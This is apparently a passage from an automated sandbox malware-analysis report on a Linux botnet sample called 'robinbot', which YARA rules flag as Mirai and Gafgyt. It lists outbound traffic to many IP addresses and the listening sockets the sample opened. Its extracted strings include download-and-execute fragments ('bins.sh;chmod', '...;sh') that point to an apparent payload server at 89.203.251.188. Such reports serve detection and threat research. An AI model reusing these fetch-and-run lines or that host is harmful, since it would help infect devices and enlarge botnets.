              Source: global trafficTCP traffic: 192.168.2.20:36146 -> 7.88.193.142:37215
              Source: global trafficTCP traffic: 192.168.2.20:40052 -> 196.56.226.212:7574
              Source: /tmp/robinbot (PID: 9448)Socket: 0.0.0.0::23
              Source: /tmp/robinbot (PID: 9448)Socket: 0.0.0.0::0
              Source: /tmp/robinbot (PID: 9448)Socket: 0.0.0.0::80
              Source: unknownTCP traffic detected without corresponding DNS query: 163.151.162.85
              Source: unknownTCP traffic detected without corresponding DNS query: 83.190.241.252
              Source: unknownTCP traffic detected without corresponding DNS query: 20.19.233.226
              Source: unknownTCP traffic detected without corresponding DNS query: 45.81.142.31
              Source: unknownTCP traffic detected without corresponding DNS query: 86.8.87.39
              Source: unknownTCP traffic detected without corresponding DNS query: 167.5.212.208
              Source: unknownTCP traffic detected without corresponding DNS query: 82.130.119.117
              Source: unknownTCP traffic detected without corresponding DNS query: 54.213.36.74
              Source: unknownTCP traffic detected without corresponding DNS query: 95.60.53.181
              Source: unknownTCP traffic detected without corresponding DNS query: 104.142.173.149
              Source: unknownTCP traffic detected without corresponding DNS query: 88.61.106.82
              Source: unknownTCP traffic detected without corresponding DNS query: 27.153.74.237
              Source: unknownTCP traffic detected without corresponding DNS query: 196.140.221.108
              Source: unknownTCP traffic detected without corresponding DNS query: 17.50.61.226
              Source: unknownTCP traffic detected without corresponding DNS query: 180.180.89.207
              Source: unknownTCP traffic detected without corresponding DNS query: 206.35.61.39
              Source: unknownTCP traffic detected without corresponding DNS query: 223.167.249.150
              Source: unknownTCP traffic detected without corresponding DNS query: 44.14.123.140
              Source: unknownTCP traffic detected without corresponding DNS query: 202.48.66.143
              Source: unknownTCP traffic detected without corresponding DNS query: 188.159.123.206
              Source: unknownTCP traffic detected without corresponding DNS query: 209.184.177.135
              Source: unknownTCP traffic detected without corresponding DNS query: 60.220.164.58
              Source: unknownTCP traffic detected without corresponding DNS query: 122.6.32.167
              Source: unknownTCP traffic detected without corresponding DNS query: 46.21.99.14
              Source: unknownTCP traffic detected without corresponding DNS query: 147.27.52.221
              Source: unknownTCP traffic detected without corresponding DNS query: 76.245.236.136
              Source: unknownTCP traffic detected without corresponding DNS query: 150.104.214.104
              Source: unknownTCP traffic detected without corresponding DNS query: 160.9.111.142
              Source: unknownTCP traffic detected without corresponding DNS query: 147.71.201.65
              Source: unknownTCP traffic detected without corresponding DNS query: 137.243.81.5
              Source: unknownTCP traffic detected without corresponding DNS query: 219.172.207.151
              Source: unknownTCP traffic detected without corresponding DNS query: 121.113.44.14
              Source: unknownTCP traffic detected without corresponding DNS query: 13.96.107.89
              Source: unknownTCP traffic detected without corresponding DNS query: 213.89.225.108
              Source: unknownTCP traffic detected without corresponding DNS query: 193.185.85.99
              Source: unknownTCP traffic detected without corresponding DNS query: 66.68.113.85
              Source: unknownTCP traffic detected without corresponding DNS query: 11.186.151.230
              Source: unknownTCP traffic detected without corresponding DNS query: 104.103.254.113
              Source: unknownTCP traffic detected without corresponding DNS query: 91.80.118.85
              Source: unknownTCP traffic detected without corresponding DNS query: 194.34.99.79
              Source: unknownTCP traffic detected without corresponding DNS query: 2.206.168.216
              Source: unknownTCP traffic detected without corresponding DNS query: 67.26.77.133
              Source: unknownTCP traffic detected without corresponding DNS query: 95.62.219.106
              Source: unknownTCP traffic detected without corresponding DNS query: 90.208.83.53
              Source: unknownTCP traffic detected without corresponding DNS query: 33.201.138.99
              Source: unknownTCP traffic detected without corresponding DNS query: 188.218.71.100
              Source: unknownTCP traffic detected without corresponding DNS query: 39.27.47.6
              Source: unknownTCP traffic detected without corresponding DNS query: 89.138.240.83
              Source: unknownTCP traffic detected without corresponding DNS query: 19.135.140.179
              Source: unknownTCP traffic detected without corresponding DNS query: 125.194.52.215
              Source: robinbotString found in binary or memory: http://89.203.251.188/bin.sh;chmod
              Source: robinbotString found in binary or memory: http://89.203.251.188/bins.sh
              Source: robinbotString found in binary or memory: http://89.203.251.188/bins.sh;$
              Source: robinbotString found in binary or memory: http://89.203.251.188/bins.sh;chmod
              Source: robinbotString found in binary or memory: http://89.203.251.188/bins.sh;sh
              Source: robinbotString found in binary or memory: http://89.203.251.188/bins.sh;sh$
              Source: robinbotString found in binary or memory: http://89.203.251.188/mips
              Source: robinbotString found in binary or memory: http://89.203.251.188/mipsel
              Source: robinbotString found in binary or memory: http://purenetworks.com/HNAP1/
              Source: robinbotString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: robinbotString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

              System Summary

              barindex
              Source: robinbot, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Mirai_95e0056c Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_95e0056c Author: unknown
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_95e0056c Author: unknown
              Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_95e0056c Author: unknown
              Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_95e0056c Author: unknown
              Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
              Source: robinbot, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Mirai_95e0056c reference_sample = 45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94, id = 95e0056c-bc07-42cf-89ab-6c0cde3ccc8a, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
              Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
